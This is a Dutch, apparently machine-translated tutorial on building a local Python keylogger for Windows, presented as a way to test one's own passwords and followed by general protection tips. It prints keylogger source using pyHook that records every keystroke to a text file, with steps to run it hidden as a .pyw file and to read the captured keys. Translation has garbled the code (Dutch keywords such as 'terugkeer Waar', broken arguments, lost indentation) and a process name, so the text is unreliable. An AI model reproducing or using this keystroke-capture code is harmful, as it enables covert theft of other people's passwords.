Een keylogger maken en wachtwoorden opnemen in Windows

keyloggers zijn een soort tool die hackers gebruiken om wachtwoorden te stelen. Het is nog een van de vele bedreigingen die in het netwerk bestaan. De creatie ervan is echter helemaal niet ingewikkeld. Je moet alleen de nodige kennis en een reeks toepassingen hebben. Op deze manier kun je je sleutels op de proef stellen en voorbereid zijn op een echte aanval waarbij ze je sleutels kunnen breken. We leggen je uit hoe je dat kunt doen.

Hoe een keylogger werkt

maak een keylogger en noteer wachtwoorden in Windows

De missie van dit type malware is om: registreer alle sleutels dat we op het toetsenbord drukken. Op deze manier, elke keer dat we inloggen op de e-mail, Facebook of een andere service, zal het programma opnemen wat we plaatsen en zo de toegangscode en gebruikersnaam stelen.

We kunnen stellen dat een keylogger een van de oudste malwaretools is. Hoewel antivirusprogramma's tegenwoordig de meeste van hen kunnen detecteren, is de waarheid dat hackers hun technieken blijven perfectioneren en erin slagen meer slachtoffers te bereiken op zowel computers als mobiele apparaten.

Het is meestal verborgen in een bestand die we downloaden via internet, een applicatie die we hebben geïnstalleerd en dergelijke. Het draait op de achtergrond op ons systeem, zonder dat we echt weten dat het werkt, en tijdens het opnemen van alle toetsaanslagen. Dit kan later worden verzonden naar een server die wordt beheerd door de aanvallers.

Deze keylogger kan zelfs uitsluitend ontworpen zijn om: wachtwoorden opnemen op systeemniveau en worden op de computer zelf opgeslagen. Als het een gedeeld team is, kan iemand anders zien wat de sleutels zijn.

Stappen om er een te maken

We gaan uitleggen hoe we dat kunnen lokaal een keylogger maken , om onze wachtwoorden te testen. Een op afstand aanmaken is completer. Wat we gaan doen is de toetsaanslagen van onze computer opnemen. Houd er rekening mee dat we dit alleen voor persoonlijk gebruik moeten doen, om onze eigen wachtwoorden te testen en geen invloed uit te oefenen op derden die die apparatuur mogelijk gebruiken.

Open Kladblok

Het eerste wat we moeten doen is de Dakramen en raamkozijnen blocnote of een andere toepassing waar we in platte tekst kunnen schrijven. Zelfs de Python-editor zelf zou het doen. In dat document dat we hebben gemaakt, moeten we de volgende code schrijven:

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent (gebeurtenis):
logging.basicConfig (bestandsnaam = file_log, niveau = logging.DEBUG, formaat = '% (bericht) s')
chr (gebeurtenis.Ascii)
logging.log (10, chr (gebeurtenis.Ascii))
terugkeer Waar
hooks_manager = pyHook.HookManager ()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

Zodra dit is gebeurd, is het volgende wat u moet doen het bestand opslaan in pyw-formaat . We kunnen het bijvoorbeeld Keylogger.pyw noemen. Simpelweg met deze stappen zullen we onze keylogger in Python klaar hebben geschreven. Vanaf dat moment kunnen we alle toetsaanslagen opnemen op het toetsenbord van onze apparatuur. Dit alles wat u gaat vastleggen wordt in een apart document bewaard.

code keylogger sencillo

Download en installeer Python

Python moet worden geïnstalleerd om het te laten werken. Als u het niet op Windows hebt geïnstalleerd, kunt u naar de officiële website gaan en de nieuwste versie downloaden. Het is momenteel 3.10.1. Ook moeten PyHook en Pywin32 worden geïnstalleerd om het soepel te laten werken.

Wanneer we het hebben geïnstalleerd en klaar voor gebruik, hoeven we alleen het bestand uit te voeren dat we eerder hebben gemaakt. We moeten naar het pad gaan waar we redden Keylogger.pyw (of welke naam we er ook aan willen geven) en dubbelklik. Vanaf dat moment begint het elke toetsaanslag die we maken op te nemen.

Proces in Taakbeheer

Als u wilt controleren of het correct werkt of niet, hoeft u alleen maar naar de Windows Taakbeheer . Om dit te doen, moet u op de toetsencombinatie Ctrl + Alt + Del drukken en het daar openen. Alle processen die worden uitgevoerd, verschijnen en degene die ons in dit geval interesseert, is pythow.exe.

Finalizar keylogger proces python

Als u het wilt voltooien, hoeft u alleen maar naar Taakbeheer te gaan, op het proces te klikken en op Voltooien te klikken. Het stopt automatisch met het registreren van de toetsen die op het toetsenbord worden ingedrukt en genereert een tekstdocument in .txt-indeling. Hier verschijnt alles wat is ingedrukt.

Bekijk het bestand met de wachtwoorden

Om het te zien tekstbestand met alle sleutels die het heeft geregistreerd (evenals elke toetsaanslag) moeten we naar de map gaan waar het bestand in .pyw-formaat was, ofwel Keylogger.pyw of welke naam we het ook noemen, en een tekstbestand met de naam keyloggeroutput. txt zal daar verschijnen.

Pulsaciones registreert keylogger

Eenmaal geopend, zien we iets dat lijkt op wat in de bovenstaande afbeelding wordt weergegeven. We zullen de sleutels kunnen zien die het heeft geregistreerd. Het is eenvoudig, ideaal om de wachtwoorden die we in Windows plaatsen te testen en te zien in hoeverre onze sleutels kunnen worden gestolen in het geval van een meer geavanceerde aanval die ze op afstand kunnen bedienen.

Tips om beschermd te worden

Nadat we hebben gezien hoe we een eenvoudige keylogger voor persoonlijk gebruik op onze computer kunnen maken, gaan we enkele tips geven om te voorkomen dat we het slachtoffer worden van dit soort aanvallen. Het is essentieel om te worden beschermd, zodat onze toegangscodes kan niet gestolen worden.

Beveiligingsprogramma's

Het eerste is om beveiligingsprogramma's te hebben. EEN goede antivirus is essentieel om het binnendringen van virussen te voorkomen. We kunnen bijvoorbeeld Windows Defender zelf, Avast, Bitdefender of een ander noemen. Er zijn veel opties, maar we moeten altijd een van de garanties kiezen.

Naast een antivirusprogramma kunnen we ook andere toepassingen hebben, zoals a firewall of zelfs add-ons voor de browser. In alle gevallen zullen ze helpen om de beveiliging te verbeteren en gevaarlijke verbindingen te vermijden die kunnen worden gebruikt om keyloggers en andere bedreigingen te sluipen.

Laat alles updaten

Soms kwetsbaarheden verschijnen in systemen . Er zijn beveiligingsfouten die van invloed zijn op bepaalde applicaties, zoals de browser. Dit kan leiden tot het binnendringen van malware en onze privacy in gevaar brengen. Om dit te voorkomen, is het essentieel om over de nieuwste versies te beschikken.

Security patches worden gebruikt om deze problemen op te lossen. We moeten Windows, de browser en elk programma dat we gebruiken hebben bijgewerkt. Ook de stuurprogramma's voor de netwerkkaart moeten up-to-date zijn, waardoor de kans op problemen wordt verkleind.

Gebruik officiële apps

Natuurlijk moeten we te allen tijde gebruik maken van officiële programma's . Het is waar dat we soms de mogelijkheid hebben om applicaties te hebben die extra functies hebben, maar omdat ze niet officieel zijn, weten we niet of het garanties zijn en op welke manier ze ons kunnen beïnvloeden.

Een hacker heeft mogelijk een programma gemaakt dat doet alsof het legitiem is, maar in werkelijkheid wordt gebruikt om informatie te stelen of een keylogger te sluipen. Om dit te voorkomen, moeten we te allen tijde software downloaden van officiële winkels en beveiligde pagina's.

Gezond verstand

Nog een tip is om gezond verstand te behouden. Het is essentieel om vermijd het maken van fouten , zoals het downloaden van bestanden die ons bereiken via email zonder de identiteit te verifiëren of links te openen via sites van derden, die mogelijk zijn gemaakt om gegevens te stelen.

De meeste aanvallen vinden plaats met gebruikersinteractie. Zelfs keyloggers, die in veel gevallen een bestand moeten downloaden of een programma moeten installeren dat we eerder hebben gedownload van een onveilige pagina.

Kortom, het maken van een keylogger voor persoonlijk gebruik is heel eenvoudig, zoals we hebben gezien. Een aanvaller kan echter een geavanceerdere maken en wachtwoorden op afstand stelen. Het is essentieel om beschermd te zijn en geen fouten te maken die ons dagelijks kunnen beïnvloeden.